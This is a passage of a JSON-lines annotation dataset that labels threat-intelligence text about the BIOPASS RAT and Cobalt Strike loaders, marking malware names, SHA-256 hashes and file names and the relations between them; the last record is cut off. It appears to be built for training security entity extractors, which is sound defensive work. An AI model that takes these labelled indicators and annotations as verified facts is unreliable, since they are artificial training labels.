sc3.txt","entities":[{"id":10186,"label":"malware","start_offset":94,"end_offset":105},{"id":10187,"label":"tools","start_offset":114,"end_offset":127},{"id":10188,"label":"SHA2","start_offset":164,"end_offset":228},{"id":10185,"label":"SHA2","start_offset":19,"end_offset":83},{"id":48989,"label":"malware","start_offset":139,"end_offset":162},{"id":48987,"label":"malware","start_offset":1,"end_offset":17},{"id":48988,"label":"FILEPATH","start_offset":85,"end_offset":92},{"id":48990,"label":"FILEPATH","start_offset":230,"end_offset":237}],"relations":[{"id":548,"from_id":10185,"to_id":10186,"type":"indicates"},{"id":549,"from_id":48988,"to_id":10186,"type":"indicates"},{"id":553,"from_id":10187,"to_id":48989,"type":"related-to"},{"id":550,"from_id":48987,"to_id":10186,"type":"duplicate-of"},{"id":551,"from_id":10185,"to_id":48988,"type":"duplicate-of"},{"id":552,"from_id":10186,"to_id":10187,"type":"uses"},{"id":554,"from_id":10188,"to_id":48989,"type":"indicates"},{"id":555,"from_id":48990,"to_id":48989,"type":"indicates"},{"id":556,"from_id":48989,"to_id":10186,"type":"duplicate-of"}],"Comments":[]} {"id":3371,"text":"BIOPASS RAT encoded Cobalt Strike shellcode Trojan.Win32.COBEACON.A 0c8c11d0206c223798d83d8498bb21231bbeb30536a20ea29a5d9273bc63313d s.txt BIOPASS RAT encoded Cobalt Strike shellcode Trojan.Win32.COBEACON.A 2beabd8a9d9a485ab6d850f67ec25abbd66bf97b933ecc13cf0d63198e9ba26e x.txt Python script of Cobalt Strike shellcode loader Trojan.Python.COBEACON.A 00977e254e744d4a242b552d055afe9d6429a5c3adb4ba169f302a53ba31795d 1-CS-443.lua LUA script of Cobalt Strike shellcode loader Trojan.Win32.COBEACON.BG dbb6c40cb1a49f4d1a5adc7f215e8e15f80b9f0b11db34c84e74a99e41671e06 Online.txt BIOPASS RAT Python Script (local online server) Trojan.Python.BIOPASS.A 943e8c9b0a0a37237ec429cb8a3ff3b39097949e6c57baf43918a34b0110dd8f getwechatdb.txt BIOPASS RAT Python Script (getwechatdb plugin script) TrojanSpy.Python.BIOPASS.A 760fe7645134100301c69289a366bb92ab14927a7fbb9b405c1352989f16488c wechat.txt BIOPASS RAT Python Script (getwechatdb plugin script) TrojanSpy.Python.BIOPASS.A bdf7ebb2b38ea0c3dfb13da5d9cc56bf439d0519b29c3da61d2b2c0ab5bc6011 xss_spoof.zip BIOPASS RAT Python Script (xss_spoof plugin package) Trojan.Python.BIOPASS.A e3183f52a388774545882c6148613c67a99086e5eb8d17a37158fc599ba8254b x.js XSS watering hole attack script Trojan.JS.BIOPASS.A d3956e237066a7c221cc4aaec27935d53f14db8ab4b1c018c84f6fccfd5d0058 script.txt XSS attack JavaScript payload Trojan.JS.BIOPASS.A 4e804bde376dc02daedf7674893470be633f8e2bda96fa64878bb1fcf3209f60 xss.txt XSS attack HTML payload Trojan.HTML.BIOPASS.A 05d1c273a4caeae787b2c3faf381b5480b27d836cd6e41266f3eb505dcee6186 flash.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 09530096643b835cff71a1e48020866fd0d4d0f643fe07f96acdcd06ce11dfa4 test-ticker.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10189,"label":"malware","start_offset":0,"end_offset":11},{"id":10190,"label":"tools","start_offset":20,"end_offset":33},{"id":10191,"label":"SHA2","start_offset":70,"end_offset":134},{"id":10192,"label":"malware","start_offset":143,"end_offset":154},{"id":10194,"label":"SHA2","start_offset":213,"end_offset":277},{"id":10196,"label":"SHA2","start_offset":361,"end_offset":425},{"id":10198,"label":"SHA2","start_offset":513,"end_offset":577},{"id":10199,"label":"malware","start_offset":591,"end_offset":602},{"id":10200,"label":"SHA2","start_offset":665,"end_offset":729},{"id":10201,"label":"malware","start_offset":748,"end_offset":759},{"id":10203,"label":"malware","start_offset":909,"end_offset":920},{"id":10204,"label":"SHA2","start_offset":992,"end_offset":1056},{"id":10205,"label":"malware","start_offset":1073,"end_offset":1084},{"id":10214,"label":"malware","start_offset":1608,"end_offset":1619},{"id":10215,"label":"SHA2","start_offset":1654,"end_offset":1718},{"id":10216,"label":"malware","start_offset":1737,"end_offset":1748},{"id":10193,"label":"tools","start_offset":163,"end_offset":176},{"id":10202,"label":"SHA2","start_offset":831,"end_offset":895},{"id":10206,"label":"SHA2","start_offset":1152,"end_offset":1216},{"id":10211,"label":"SHA2","start_offset":1408,"end_offset":1472},{"id":10213,"label":"SHA2","start_offset":1531,"end_offset":1595},{"id":48995,"label":"malware","start_offset":335,"end_offset":359},{"id":48996,"label":"malware","start_offset":428,"end_offset":440},{"id":49000,"label":"FILEPATH","start_offset":731,"end_offset":746},{"id":49007,"label":"attack-pattern","start_offset":1224,"end_offset":1255},{"id":49008,"label":"malware","start_offset":1257,"end_offset":1276},{"id":49009,"label":"SHA2","start_offset":1278,"end_offset":1342},{"id":49010,"label":"FILEPATH","start_offset":1344,"end_offset":1354},{"id":49002,"label":"FILEPATH","start_offset":897,"end_offset":907},{"id":49012,"label":"malware","start_offset":1387,"end_offset":1406},{"id":48998,"label":"FILEPATH","start_offset":579,"end_offset":589},{"id":49001,"label":"malware","start_offset":803,"end_offset":829},{"id":49004,"label":"FILEPATH","start_offset":1058,"end_offset":1071},{"id":49005,"label":"malware","start_offset":1127,"end_offset":1150},{"id":49006,"label":"FILEPATH","start_offset":1218,"end_offset":1222},{"id":49011,"label":"attack-pattern","start_offset":1356,"end_offset":1366},{"id":48991,"label":"malware","start_offset":45,"end_offset":68},{"id":48992,"label":"FILEPATH","start_offset":136,"end_offset":141},{"id":48993,"label":"malware","start_offset":188,"end_offset":211},{"id":48994,"label":"FILEPATH","start_offset":279,"end_offset":284},{"id":48997,"label":"malware","start_offset":488,"end_offset":512},{"id":48999,"label":"malware","start_offset":640,"end_offset":663},{"id":49003,"label":"malware","start_offset":964,"end_offset":990},{"id":49013,"label":"FILEPATH","start_offset":1474,"end_offset":1481},{"id":49014,"label":"attack-pattern","start_offset":1483,"end_offset":1493},{"id":49015,"label":"malware","start_offset":1508,"end_offset":1529},{"id":49016,"label":"FILEPATH","start_offset":1597,"end_offset":1606},{"id":49017,"label":"malware","start_offset":1628,"end_offset":1652},{"id":49018,"label":"FILEPATH","start_offset":1720,"end_offset":1735}],"relations":[],"Comments":[]} {"id":3372,"text":"Win32.BIOPASS.A","entities":[{"id":49019,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3373,"text":" 0b16dfa3e0bbcc7b04a9a43309e911059a4d8c5892b1068e0441b177960d3eee","entities":[{"id":10217,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3374,"text":"Silverlight_ins.exe BIOPASS RAT Loader","entities":[{"id":10218,"label":"malware","start_offset":21,"end_offset":32},{"id":49020,"label":"FILEPATH","start_offset":0,"end_offset":19}],"relations":[{"id":557,"from_id":49020,"to_id":10218,"type":"indicates"}],"Comments":[]} {"id":3375,"text":" Backdoor.Win64.BIOPASS.A 0f18694b400e14eb995003541f16f75a5afc2478cc415a6295d171ba93565a82 flash_installer.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 11b785e77cbfa2d3849575cdfabd85d41bae3f2e0d33a77e7e2c46a45732d6e4 System.exe","entities":[{"id":10219,"label":"SHA2","start_offset":27,"end_offset":91},{"id":10220,"label":"malware","start_offset":114,"end_offset":125},{"id":49022,"label":"FILEPATH","start_offset":93,"end_offset":112},{"id":10221,"label":"SHA2","start_offset":160,"end_offset":224},{"id":49021,"label":"malware","start_offset":1,"end_offset":25},{"id":49023,"label":"malware","start_offset":134,"end_offset":158},{"id":49024,"label":"FILEPATH","start_offset":226,"end_offset":236}],"relations":[{"id":558,"from_id":10219,"to_id":10220,"type":"indicates"},{"id":559,"from_id":49022,"to_id":10220,"type":"indicates"},{"id":560,"from_id":10221,"to_id":49023,"type":"indicates"},{"id":561,"from_id":49024,"to_id":49023,"type":"indicates"},{"id":562,"from_id":49023,"to_id":10220,"type":"duplicate-of"},{"id":563,"from_id":49021,"to_id":10220,"type":"duplicate-of"},{"id":564,"from_id":10219,"to_id":49022,"type":"duplicate-of"},{"id":565,"from_id":10221,"to_id":49024,"type":"duplicate-of"}],"Comments":[]} {"id":3376,"text":"BIOPASS RAT Loader Backdoor.","entities":[{"id":10222,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3377,"text":"Win64.BIOPASS.A","entities":[{"id":49025,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3378,"text":" 2243c10b1bd64dfb55eda08bc8b85610d7fa5ba759527b4b4dd16dfac584ef25","entities":[{"id":10223,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3379,"text":"test3.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 281c938448e32eb12fe8c5439ef06cea848668cf57fed5ad64b9a8d1e07de561","entities":[{"id":10224,"label":"malware","start_offset":11,"end_offset":22},{"id":10225,"label":"SHA2","start_offset":57,"end_offset":121},{"id":49026,"label":"FILEPATH","start_offset":0,"end_offset":9},{"id":49027,"label":"malware","start_offset":31,"end_offset":55}],"relations":[{"id":566,"from_id":49026,"to_id":10224,"type":"indicates"},{"id":567,"from_id":10225,"to_id":10224,"type":"indicates"},{"id":568,"from_id":49027,"to_id":10224,"type":"duplicate-of"},{"id":569,"from_id":49026,"to_id":10225,"type":"duplicate-of"}],"Comments":[]} {"id":3380,"text":"flash1.exe ","entities":[{"id":49028,"label":"malware","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":3381,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 2b580af1cdc4655ae75ef503aba7600e05cdd68b056a9354a2184b7fbb24db6f Silverlight_ins.exe ","entities":[{"id":10226,"label":"malware","start_offset":0,"end_offset":11},{"id":10227,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49029,"label":"malware","start_offset":20,"end_offset":44},{"id":49030,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":570,"from_id":10226,"to_id":49029,"type":"duplicate-of"},{"id":571,"from_id":10227,"to_id":49029,"type":"indicates"},{"id":572,"from_id":49030,"to_id":49029,"type":"indicates"},{"id":573,"from_id":49030,"to_id":10227,"type":"duplicate-of"}],"Comments":[]} {"id":3382,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 30a65a54acfbf8d412ade728cad86c5c769befa4e456f7c0e552e1ab0862a446 flash-64.exe","entities":[{"id":10228,"label":"malware","start_offset":0,"end_offset":11},{"id":10229,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49032,"label":"FILEPATH","start_offset":112,"end_offset":124},{"id":49031,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":574,"from_id":49032,"to_id":10229,"type":"duplicate-of"},{"id":575,"from_id":10228,"to_id":49031,"type":"duplicate-of"},{"id":576,"from_id":49032,"to_id":49031,"type":"indicates"},{"id":577,"from_id":10229,"to_id":49031,"type":"indicates"}],"Comments":[]} {"id":3383,"text":"BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe Silverlight_ins.exe ","entities":[{"id":10230,"label":"malware","start_offset":0,"end_offset":11},{"id":10231,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49034,"label":"FILEPATH","start_offset":112,"end_offset":131},{"id":49033,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":578,"from_id":10230,"to_id":49033,"type":"duplicate-of"},{"id":579,"from_id":49034,"to_id":10231,"type":"duplicate-of"},{"id":580,"from_id":49034,"to_id":49033,"type":"indicates"},{"id":581,"from_id":10231,"to_id":49033,"type":"indicates"}],"Comments":[]} {"id":3384,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 3195c355aa564ea66b4b37baa9547cb53dde7cf4ae7010256db92fff0bde873d flash.exe","entities":[{"id":10232,"label":"malware","start_offset":0,"end_offset":11},{"id":10233,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49035,"label":"malware","start_offset":20,"end_offset":44},{"id":49036,"label":"FILEPATH","start_offset":112,"end_offset":121}],"relations":[{"id":582,"from_id":10232,"to_id":49035,"type":"duplicate-of"},{"id":583,"from_id":49036,"to_id":10233,"type":"duplicate-of"},{"id":584,"from_id":49036,"to_id":49035,"type":"indicates"},{"id":585,"from_id":10233,"to_id":49035,"type":"indicates"}],"Comments":[]} {"id":3385,"text":" BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 32a3934d96a8f2dae805fa28355cd0155c22ffad4545f9cd9c1ba1e9545b39ac","entities":[{"id":10234,"label":"malware","start_offset":1,"end_offset":12},{"id":10235,"label":"SHA2","start_offset":47,"end_offset":111},{"id":49037,"label":"malware","start_offset":21,"end_offset":45}],"relations":[{"id":586,"from_id":10234,"to_id":49037,"type":"duplicate-of"},{"id":587,"from_id":10235,"to_id":49037,"type":"indicates"}],"Comments":[]} {"id":3386,"text":"test.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10236,"label":"malware","start_offset":10,"end_offset":21},{"id":49038,"label":"FILEPATH","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} {"id":3387,"text":"Win32.BIOPASS.A","entities":[{"id":49039,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3388,"text":" 32c1460ba5707783f1bbaedab5e5eab21d762094106d6af8fa6b2f0f0d777c1a","entities":[{"id":10237,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3389,"text":"test3.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 344cdbc2a7e0908cb6638bc7b81b6b697b32755bad3bed09c511866eff3876c7","entities":[{"id":10238,"label":"malware","start_offset":11,"end_offset":22},{"id":10239,"label":"SHA2","start_offset":57,"end_offset":121},{"id":49041,"label":"malware","start_offset":31,"end_offset":55},{"id":49040,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[{"id":588,"from_id":49040,"to_id":49041,"type":"indicates"},{"id":589,"from_id":10238,"to_id":49041,"type":"duplicate-of"},{"id":590,"from_id":49040,"to_id":10239,"type":"duplicate-of"},{"id":591,"from_id":10239,"to_id":49041,"type":"indicates"}],"Comments":[]} {"id":3390,"text":"test4.exe BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 3589e53c59d9807cca709387bbcaaffc7e24e15d9a78425b717fc55c779b928e","entities":[{"id":10240,"label":"malware","start_offset":11,"end_offset":22},{"id":10241,"label":"SHA2","start_offset":57,"end_offset":121},{"id":49042,"label":"FILEPATH","start_offset":0,"end_offset":9},{"id":49043,"label":"malware","start_offset":31,"end_offset":55}],"relations":[{"id":592,"from_id":49042,"to_id":49043,"type":"indicates"},{"id":593,"from_id":10241,"to_id":49043,"type":"indicates"},{"id":594,"from_id":10240,"to_id":49043,"type":"duplicate-of"},{"id":595,"from_id":49042,"to_id":10241,"type":"duplicate-of"}],"Comments":[]} {"id":3391,"text":"flash.exe ","entities":[{"id":49044,"label":"malware","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":3392,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 36e3fcd6a4c7c9db985be77ea6394b2ed019332fdae4739df2f96a541ea52617 Silverlight.exe","entities":[{"id":10242,"label":"malware","start_offset":0,"end_offset":11},{"id":10243,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49045,"label":"malware","start_offset":20,"end_offset":44},{"id":49046,"label":"FILEPATH","start_offset":112,"end_offset":127}],"relations":[{"id":596,"from_id":10242,"to_id":49045,"type":"duplicate-of"},{"id":597,"from_id":49046,"to_id":10243,"type":"duplicate-of"},{"id":598,"from_id":49046,"to_id":49045,"type":"indicates"},{"id":599,"from_id":10243,"to_id":49045,"type":"indicates"}],"Comments":[]} {"id":3393,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 3e8f8b8a5f70c195a2e4d4fc7f80523809f6dbf9ead061ce8ef04fb489a577cf test-flash.exe BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba flash_installer.exe ","entities":[{"id":10244,"label":"malware","start_offset":0,"end_offset":11},{"id":10246,"label":"malware","start_offset":128,"end_offset":139},{"id":10245,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10247,"label":"SHA2","start_offset":174,"end_offset":238},{"id":49048,"label":"malware","start_offset":20,"end_offset":44},{"id":49047,"label":"malware","start_offset":148,"end_offset":172},{"id":49050,"label":"FILEPATH","start_offset":240,"end_offset":259},{"id":49049,"label":"FILEPATH","start_offset":112,"end_offset":126}],"relations":[{"id":600,"from_id":10244,"to_id":49048,"type":"duplicate-of"},{"id":601,"from_id":10246,"to_id":49047,"type":"duplicate-of"},{"id":602,"from_id":49049,"to_id":10245,"type":"duplicate-of"},{"id":603,"from_id":49050,"to_id":10247,"type":"duplicate-of"},{"id":604,"from_id":10247,"to_id":49047,"type":"indicates"},{"id":605,"from_id":49050,"to_id":49047,"type":"indicates"},{"id":606,"from_id":49049,"to_id":49048,"type":"indicates"},{"id":607,"from_id":10245,"to_id":49048,"type":"indicates"}],"Comments":[]} {"id":3394,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 5fd2da648068f75a4a66b08d6d93793f735be62ae88085a79d839b6a0d6d859a flash1.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 660cef8210f823acb0b31d78fbce1d6f3f8c4f43231286f7ac69f75b2c42c020 flashplayerpp_install_cn.exe","entities":[{"id":10248,"label":"malware","start_offset":0,"end_offset":11},{"id":10249,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10250,"label":"malware","start_offset":124,"end_offset":135},{"id":10251,"label":"SHA2","start_offset":170,"end_offset":234},{"id":49052,"label":"malware","start_offset":144,"end_offset":168},{"id":49053,"label":"FILEPATH","start_offset":236,"end_offset":264},{"id":49054,"label":"FILEPATH","start_offset":112,"end_offset":122},{"id":49051,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":608,"from_id":10248,"to_id":49051,"type":"duplicate-of"},{"id":609,"from_id":10250,"to_id":49052,"type":"duplicate-of"},{"id":610,"from_id":49054,"to_id":10249,"type":"duplicate-of"},{"id":611,"from_id":49053,"to_id":10251,"type":"duplicate-of"},{"id":612,"from_id":10251,"to_id":49052,"type":"indicates"},{"id":613,"from_id":49053,"to_id":49052,"type":"indicates"},{"id":614,"from_id":49054,"to_id":49051,"type":"indicates"},{"id":615,"from_id":10249,"to_id":49051,"type":"indicates"}],"Comments":[]} {"id":3395,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 69d930050b2445937ec6a4f9887296928bf663f7a71132676be3f112e80fe275 test.exe ","entities":[{"id":10252,"label":"malware","start_offset":0,"end_offset":11},{"id":10253,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49056,"label":"FILEPATH","start_offset":112,"end_offset":120},{"id":49055,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":616,"from_id":49056,"to_id":10253,"type":"duplicate-of"},{"id":617,"from_id":10252,"to_id":49055,"type":"duplicate-of"},{"id":619,"from_id":10253,"to_id":49055,"type":"indicates"},{"id":618,"from_id":49056,"to_id":49055,"type":"indicates"}],"Comments":[]} {"id":3396,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 6a0976e5f9d07ff3d80fa2958976183758ba5fcdd4645e391614a347b4b8e64b f0b96efe2f714e7bddf76cc90a8b8c88_se.exe ","entities":[{"id":10254,"label":"malware","start_offset":0,"end_offset":11},{"id":10255,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10256,"label":"FILEPATH","start_offset":112,"end_offset":151},{"id":49057,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":620,"from_id":10254,"to_id":49057,"type":"duplicate-of"},{"id":621,"from_id":10256,"to_id":10255,"type":"duplicate-of"},{"id":622,"from_id":10256,"to_id":49057,"type":"indicates"},{"id":623,"from_id":10255,"to_id":49057,"type":"indicates"}],"Comments":[]} {"id":3397,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 6ee8f6a0c514a5bd25f7a32210f4b3fe878d9d417a7ebe07befc285131bae10e news.exe","entities":[{"id":10258,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10257,"label":"malware","start_offset":0,"end_offset":11},{"id":49059,"label":"FILEPATH","start_offset":112,"end_offset":120},{"id":49058,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":626,"from_id":49059,"to_id":49058,"type":"indicates"},{"id":627,"from_id":10258,"to_id":49058,"type":"indicates"},{"id":624,"from_id":10257,"to_id":49058,"type":"duplicate-of"},{"id":625,"from_id":49059,"to_id":10258,"type":"duplicate-of"}],"Comments":[]} {"id":3398,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 75e03f40a088903579a436c0d8e8bc3d0d71cf2942ad793cc948f36866a2e1ad silverlight_ins.exe ","entities":[{"id":10259,"label":"malware","start_offset":0,"end_offset":11},{"id":49060,"label":"malware","start_offset":20,"end_offset":44},{"id":10260,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49061,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":628,"from_id":49061,"to_id":10260,"type":"duplicate-of"},{"id":629,"from_id":10259,"to_id":49060,"type":"duplicate-of"},{"id":630,"from_id":10260,"to_id":49060,"type":"indicates"},{"id":631,"from_id":49061,"to_id":49060,"type":"indicates"}],"Comments":[]} {"id":3399,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 7d0d7d416db5bd7201420982987e213a129eef2314193e4558a24f3c9a91a38e flash_installer.exe ","entities":[{"id":10261,"label":"malware","start_offset":0,"end_offset":11},{"id":10262,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49062,"label":"malware","start_offset":20,"end_offset":44},{"id":49063,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":632,"from_id":49063,"to_id":49062,"type":"indicates"},{"id":633,"from_id":10262,"to_id":49062,"type":"indicates"},{"id":634,"from_id":10261,"to_id":49062,"type":"duplicate-of"},{"id":635,"from_id":10262,"to_id":49063,"type":"duplicate-of"}],"Comments":[]} {"id":3400,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0 Silverlight.exe","entities":[{"id":10263,"label":"malware","start_offset":0,"end_offset":11},{"id":10264,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49064,"label":"malware","start_offset":20,"end_offset":44},{"id":49065,"label":"FILEPATH","start_offset":112,"end_offset":127}],"relations":[{"id":636,"from_id":10263,"to_id":49064,"type":"duplicate-of"},{"id":637,"from_id":49065,"to_id":10264,"type":"duplicate-of"},{"id":638,"from_id":10264,"to_id":49064,"type":"indicates"},{"id":639,"from_id":49065,"to_id":49064,"type":"indicates"}],"Comments":[]} {"id":3401,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 8445c0189735766edf0e3d01b91f6f98563fef272ac5c92d3701a1174ad072dd Silverlight_ins.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 89c0b2036ce8d1d91f6d8b8171219aafcd6237c811770fa16edf922cedfecc54 MTYwOTI1MzEzNQ==.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10265,"label":"malware","start_offset":0,"end_offset":11},{"id":10266,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10267,"label":"malware","start_offset":133,"end_offset":144},{"id":10268,"label":"SHA2","start_offset":179,"end_offset":243},{"id":10269,"label":"malware","start_offset":267,"end_offset":278},{"id":49066,"label":"malware","start_offset":20,"end_offset":44},{"id":49067,"label":"FILEPATH","start_offset":112,"end_offset":131},{"id":49068,"label":"malware","start_offset":153,"end_offset":177},{"id":49069,"label":"FILEPATH","start_offset":245,"end_offset":265}],"relations":[{"id":640,"from_id":10265,"to_id":49066,"type":"duplicate-of"},{"id":641,"from_id":49067,"to_id":10266,"type":"duplicate-of"},{"id":642,"from_id":10267,"to_id":49068,"type":"duplicate-of"},{"id":643,"from_id":10269,"to_id":49068,"type":"duplicate-of"},{"id":644,"from_id":10268,"to_id":49069,"type":"duplicate-of"},{"id":645,"from_id":49067,"to_id":49066,"type":"indicates"},{"id":646,"from_id":10266,"to_id":49066,"type":"indicates"},{"id":647,"from_id":10268,"to_id":10269,"type":"indicates"},{"id":648,"from_id":49069,"to_id":10269,"type":"indicates"}],"Comments":[]} {"id":3402,"text":"Win64.BIOPASS.A","entities":[{"id":49070,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3403,"text":" 8b5d4840bbdce0798950cd5584e3d4564581a7698bc6cfb2892c97b826129cec Silverlight_ins.exe","entities":[{"id":10270,"label":"SHA2","start_offset":1,"end_offset":65},{"id":49071,"label":"FILEPATH","start_offset":67,"end_offset":86}],"relations":[{"id":649,"from_id":10270,"to_id":49071,"type":"duplicate-of"}],"Comments":[]} {"id":3404,"text":"BIOPASS RAT Loader Backdoor.","entities":[{"id":10271,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3405,"text":"Win64.BIOPASS.A","entities":[{"id":49072,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3406,"text":" 932B45AB117960390324678B0696EF0E07D7F8DE1FA0B94C529F243610F1DCC9","entities":[{"id":10272,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3407,"text":"flash_ins.exe ","entities":[{"id":49073,"label":"FILEPATH","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} {"id":3408,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 98a91356e0094c96d81bd27af407dd48c3c91aaf97da6794aeb303597a773749 Silverlight1.exe","entities":[{"id":10273,"label":"malware","start_offset":0,"end_offset":11},{"id":10274,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49074,"label":"malware","start_offset":20,"end_offset":44},{"id":49075,"label":"FILEPATH","start_offset":112,"end_offset":128}],"relations":[{"id":650,"from_id":10273,"to_id":49074,"type":"duplicate-of"},{"id":651,"from_id":49075,"to_id":10274,"type":"duplicate-of"},{"id":652,"from_id":49075,"to_id":49074,"type":"indicates"},{"id":653,"from_id":10274,"to_id":49074,"type":"indicates"}],"Comments":[]} {"id":3409,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 9eed9a2e0edf38f6354f4e57b3a6b9bed5b19263f54bcee19e66fc8af0c29e4e test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 9f34d28562e7e1e3721bbf679c58aa8f5898995ed999a641f26de120f3a42cf4 Silverlight1.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 9ff906ffcde32e4c6fb3ea4652e6d6326713a7fde8bb783b52f12a1f382f8798 test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A a7c4dac7176e291bd2aba860e1aa301fb5f7d880794f493f2dea0982e2b7eb31 test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A b48e01ff816f12125f9f4cfc9180d534c7c57ef4ee50c0ebbe445e88d4ade939 test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A b82bde3fe5ee900a76ac27b4869ed9aa0802c63bbd72b3bfb0f1abce6340cc6c Silverlight_ins.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A b9d0838be8952ebd4218c8f548ce94901f789ec1e32f5eaf46733f0c94c77999 Silverlight_ins.exe ","entities":[{"id":10275,"label":"malware","start_offset":0,"end_offset":11},{"id":10276,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10277,"label":"malware","start_offset":122,"end_offset":133},{"id":10279,"label":"malware","start_offset":252,"end_offset":263},{"id":10281,"label":"malware","start_offset":374,"end_offset":385},{"id":10282,"label":"SHA2","start_offset":420,"end_offset":484},{"id":10283,"label":"malware","start_offset":496,"end_offset":507},{"id":10284,"label":"SHA2","start_offset":542,"end_offset":606},{"id":10285,"label":"malware","start_offset":618,"end_offset":629},{"id":10286,"label":"SHA2","start_offset":664,"end_offset":728},{"id":10287,"label":"malware","start_offset":751,"end_offset":762},{"id":10288,"label":"SHA2","start_offset":797,"end_offset":861},{"id":10278,"label":"SHA2","start_offset":168,"end_offset":232},{"id":10280,"label":"SHA2","start_offset":298,"end_offset":362},{"id":49076,"label":"malware","start_offset":20,"end_offset":44},{"id":49078,"label":"FILEPATH","start_offset":234,"end_offset":250},{"id":49079,"label":"malware","start_offset":272,"end_offset":296},{"id":49081,"label":"malware","start_offset":394,"end_offset":418},{"id":49083,"label":"malware","start_offset":516,"end_offset":540},{"id":49087,"label":"malware","start_offset":771,"end_offset":795},{"id":49077,"label":"malware","start_offset":142,"end_offset":166},{"id":49080,"label":"FILEPATH","start_offset":364,"end_offset":372},{"id":49084,"label":"FILEPATH","start_offset":608,"end_offset":616},{"id":49086,"label":"FILEPATH","start_offset":730,"end_offset":749},{"id":49088,"label":"FILEPATH","start_offset":863,"end_offset":882},{"id":49089,"label":"FILEPATH","start_offset":112,"end_offset":120},{"id":49082,"label":"FILEPATH","start_offset":486,"end_offset":494},{"id":49085,"label":"malware","start_offset":638,"end_offset":662}],"relations":[{"id":654,"from_id":10275,"to_id":49076,"type":"duplicate-of"},{"id":655,"from_id":10277,"to_id":49077,"type":"duplicate-of"},{"id":656,"from_id":10279,"to_id":49079,"type":"duplicate-of"},{"id":657,"from_id":10281,"to_id":49081,"type":"duplicate-of"},{"id":658,"from_id":10283,"to_id":49083,"type":"duplicate-of"},{"id":659,"from_id":10285,"to_id":49085,"type"